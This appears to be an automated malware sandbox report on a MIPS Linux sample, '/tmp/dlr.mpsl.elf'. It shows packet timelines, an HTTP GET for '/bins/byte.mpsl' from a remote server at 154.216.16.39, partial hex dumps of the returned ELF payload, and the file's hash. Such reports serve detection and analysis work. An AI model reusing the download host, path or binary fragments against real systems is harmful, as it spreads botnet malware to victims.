                                              Nov 1, 2024 14:57:55.972486019 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972500086 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972516060 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972775936 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972788095 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972800970 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972914934 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972929001 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.972942114 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973716021 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973730087 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973743916 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973798037 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973810911 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973824024 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.973985910 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.974709988 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.975071907 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.976015091 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:55.978919983 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.978934050 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.978948116 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.979106903 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:55.980243921 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.201025009 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.201073885 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.228540897 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.234236956 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234266043 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234278917 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234318018 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234330893 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234343052 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234354019 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234801054 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234812975 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234822989 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234833956 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234849930 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234862089 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234874964 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.234884977 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.235158920 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.452961922 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.453015089 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.590719938 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.595729113 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.595798016 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:56.595833063 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.595870018 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.595905066 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.595947027 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.595994949 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.596029043 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.596065998 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:57:56.597575903 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:58.145190001 CET4542680192.168.2.23154.216.16.39
                                              Nov 1, 2024 14:57:58.150142908 CET8045426154.216.16.39192.168.2.23
                                              Nov 1, 2024 14:58:00.964539051 CET42836443192.168.2.2391.189.91.43
                                              Nov 1, 2024 14:58:02.244391918 CET4251680192.168.2.23109.202.202.202
                                              Nov 1, 2024 14:58:16.322477102 CET43928443192.168.2.2391.189.91.42
                                              Nov 1, 2024 14:58:26.560995102 CET42836443192.168.2.2391.189.91.43
                                              Nov 1, 2024 14:58:32.704144955 CET4251680192.168.2.23109.202.202.202
                                              Nov 1, 2024 14:58:57.276741982 CET43928443192.168.2.2391.189.91.42
                                              Nov 1, 2024 14:59:17.753865004 CET42836443192.168.2.2391.189.91.43
                                              Session IDSource IPSource PortDestination IPDestination Port
                                              0192.168.2.2345426154.216.16.3980
                                              TimestampBytes transferredDirectionData
                                              Nov 1, 2024 14:57:54.818509102 CET46OUTGET /bins/byte.mpsl HTTP/1.0
                                              Data Raw: 00 00
                                              Data Ascii:
                                              Nov 1, 2024 14:57:55.697272062 CET1236INHTTP/1.1 200 OK
                                              Date: Fri, 01 Nov 2024 13:57:55 GMT
                                              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                                              Last-Modified: Thu, 31 Oct 2024 11:24:54 GMT
                                              ETag: "18d44-625c4114a208b"
                                              Accept-Ranges: bytes
                                              Content-Length: 101700
                                              Connection: close
                                              Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 08 00 01 00 00 00 60 02 40 00 34 00 00 00 14 8b 01 00 07 10 00 00 34 00 20 00 03 00 28 00 0e 00 0d 00 01 00 00 00 00 00 00 00 00 00 40 00 00 00 40 00 a0 79 01 00 a0 79 01 00 05 00 00 00 00 00 01 00 01 00 00 00 a4 79 01 00 a4 79 45 00 a4 79 45 00 0c 11 00 00 fc 33 00 00 06 00 00 00 00 00 01 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 06 00 1c 3c 6c 05 9c 27 21 e0 99 03 e0 ff bd 27 10 00 bc af 1c 00 bf af 18 00 bc af 01 00 11 04 00 00 00 00 06 00 1c 3c 48 05 9c 27 21 e0 9f 03 24 80 99 8f 00 00 00 00 dc 01 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 01 00 11 04 00 00 00 00 06 00 1c 3c 18 05 9c 27 21 e0 9f 03 20 80 99 8f 00 00 00 00 c0 4e 39 27 09 f8 20 03 00 00 00 00 10 00 bc 8f 00 00 00 00 1c 00 bf 8f 00 00 00 00 08 00 e0 03 20 00 bd 27 06 00 1c 3c e0 04 9c 27 21 e0 99 03 d8 ff bd 27 20 00 bf af 1c 00 b1 af 18 00 b0 af 10 00 bc af 18 80 91 8f 00 00 00 00 d0 8a 22 92 00 00 00 00 1d 00 [TRUNCATED]
                                              Data Ascii: ELF`@44 (@@yyyyEyE3Qtd<l'!'<H'!$9' <'! N9' '<'!' "@yY B$ yyY B$4@$ 4 y$$" ('<$'!' y$@$ y@y$ ' '!<'!!x'$$' 00F$!@bFc$%!(`!!<'!'0,($ !!00H $P@0,($ 8' P@
                                              Nov 1, 2024 14:57:55.697294950 CET1236INData Raw: 20 03 21 20 40 02 10 00 bc 8f 00 00 00 00 50 82 99 8f 00 00 00 00 09 f8 20 03 00 00 00 00 10 00 bc 8f 21 20 40 00 54 83 99 8f 00 00 00 00 09 f8 20 03 09 00 05 24 10 00 bc 8f 00 00 00 00 94 81 99 8f 00 00 00 00 09 f8 20 03 21 20 00 00 c8 81 82 8f
                                              Data Ascii: ! @P ! @T $ ! FXCdQ!($dQc$L! `!( !0<P'!'TPLH
                                              Nov 1, 2024 14:57:55.697309017 CET1236INData Raw: e0 03 21 10 e0 00 00 00 a4 8c 00 00 00 00 fb ff 80 10 00 00 00 00 c0 83 99 8f 00 00 00 00 08 00 20 03 0a 00 05 24 06 00 1c 3c 38 fd 9c 27 21 e0 99 03 d8 ff bd 27 24 00 bf af 20 00 b2 af 1c 00 b1 af 18 00 b0 af 10 00 bc af 70 83 99 8f 01 00 04 24
                                              Data Ascii: ! $<8'!'$ p$ $X!@D("$ p!b$qB$ $!@D$(#" $
                                              Nov 1, 2024 14:57:55.697321892 CET1236INData Raw: 99 8f ff 00 92 30 64 00 a5 af 21 20 40 02 04 00 05 24 21 80 e0 00 09 f8 20 03 ff 00 d1 30 10 00 bc 8f 21 20 40 02 70 83 99 8f 04 00 05 24 09 f8 20 03 21 a8 40 00 10 00 bc 8f 21 20 20 02 08 82 99 8f 21 28 00 02 07 00 06 24 ff ff 07 34 09 f8 20 03
                                              Data Ascii: 0d! @$! 0! @p$ !@! !($4 !@B0! !($4 0! !(!0$ W0! !($$ S04 $(!2%
                                              Nov 1, 2024 14:57:55.697336912 CET508INData Raw: e2 32 00 12 02 00 02 1a 17 00 25 18 62 00 2c 00 a3 af 63 00 40 1a 00 00 00 00 30 00 a3 8f 64 00 b1 8f ff 00 62 30 00 12 02 00 02 1a 03 00 25 18 62 00 21 b8 00 00 09 00 00 10 34 00 a3 af 84 84 99 8f 00 00 c4 8f 09 f8 20 03 10 00 06 24 04 00 de 27
                                              Data Ascii: 2%b,c@0db0%b!4 $'R1&p4 $(04[4"$$ !0(c$($&H! @'$LC$,
                                              Nov 1, 2024 14:57:55.697351933 CET1236INData Raw: 00 10 00 00 00 00 09 f8 20 03 00 00 00 00 10 00 bc 8f a5 ff 00 10 02 00 22 a6 5c 00 bf 8f 58 00 be 8f 54 00 b7 8f 50 00 b6 8f 4c 00 b5 8f 48 00 b4 8f 44 00 b3 8f 40 00 b2 8f 3c 00 b1 8f 38 00 b0 8f 08 00 e0 03 60 00 bd 27 b8 82 99 8f 00 00 00 00
                                              Data Ascii: "\XTPLHD@<8`' B0o,!!!P! !(`!D!(!0`@$ 1&2&@<'!'|xtplhd
                                              Nov 1, 2024 14:57:55.697366953 CET1236INData Raw: 20 03 0a 00 20 a6 18 00 bc 8f 0a 00 22 a6 84 81 99 8f 04 00 46 96 21 20 20 02 21 28 40 02 21 38 e0 02 09 f8 20 03 06 00 40 a6 20 00 a3 8f 18 00 bc 8f 40 21 03 00 c0 18 03 00 23 20 83 00 84 00 a3 8f 02 00 45 96 21 20 83 00 06 00 42 a6 e4 82 99 8f
                                              Data Ascii: "F! !(@!8 @ @!# E! B$D!( !0 @$ d$*@ ` <$(@!# *! 2&%d%%
                                              Nov 1, 2024 14:57:55.697380066 CET1236INData Raw: 99 8f 00 00 47 8c 21 28 00 02 21 20 20 02 09 f8 20 03 19 00 06 24 18 00 bc 8f 60 00 a2 af e0 83 99 8f 02 00 04 24 03 00 05 24 09 f8 20 03 06 00 06 24 ff ff 10 24 18 00 bc 8f 99 01 50 10 5c 00 a2 af 20 83 99 8f 01 00 02 24 04 00 03 24 5c 00 a4 8f
                                              Data Ascii: G!(! $`$$ $$P\ $$\ !($ 'P22v2D L'(b0C$BD$B$0B00c0I000m03222":JR*Z
                                              Nov 1, 2024 14:57:55.697592020 CET1236INData Raw: 03 00 23 20 83 00 ac 00 a3 8f 06 00 82 a6 21 20 83 00 10 00 25 8e 02 00 02 24 00 00 82 a4 10 00 02 24 04 00 85 ac e4 82 99 8f 10 00 a4 af 14 00 a2 af 68 00 a6 8f 02 00 80 a4 5c 00 a4 8f 21 28 20 02 09 f8 20 03 00 40 07 24 20 00 a3 8f 18 00 bc 8f
                                              Data Ascii: # ! %$$h\!( @$ d$*@ {| <$(@!# *! 2&%d%%!<$2&%%D`
                                              Nov 1, 2024 14:57:55.697606087 CET1236INData Raw: 45 01 25 70 cb 01 25 78 ec 01 25 98 a3 01 21 80 00 00 3c 00 a6 af 38 00 a7 af 34 00 a2 af 30 00 aa af 2c 00 ae af 0e 00 00 10 28 00 af af 10 00 02 8e 00 00 00 00 10 00 22 ae 20 00 a2 8f 2c 00 a3 8f 01 00 50 24 28 00 a4 8f 00 00 43 a6 2a 18 14 02
                                              Data Ascii: E%p%x%!<840,(" ,P$(C*SDh` p$ $\ ! \!dp$$$C@B4$DB4PT&<8L,&&@
                                              Nov 1, 2024 14:57:55.702238083 CET1236INData Raw: 00 00 7b ff 40 10 00 00 00 00 fc 82 99 8f 48 00 a5 8f 09 f8 20 03 08 00 64 26 18 00 bc 8f 74 ff 00 10 00 00 00 00 48 00 a4 8f 48 00 a2 8f 08 00 84 24 34 00 42 24 60 00 a4 af 44 ff 80 1a 64 00 a2 af 45 ff 00 10 20 00 a0 af 06 00 1c 3c ac d9 9c 27
                                              Data Ascii: {@H d&tHH$4B$`DdE <'!'d`\XTPLHD@p0l! $! 0! !($!8 8B0! !($4 4!


                                              System Behavior

                                              Start time (UTC):13:57:53
                                              Start date (UTC):01/11/2024
                                              Path:/tmp/dlr.mpsl.elf
                                              Arguments:/tmp/dlr.mpsl.elf
                                              File size:5773336 bytes
                                              MD5 hash:0d6f61f82cf2f781c6eb0661071d42d9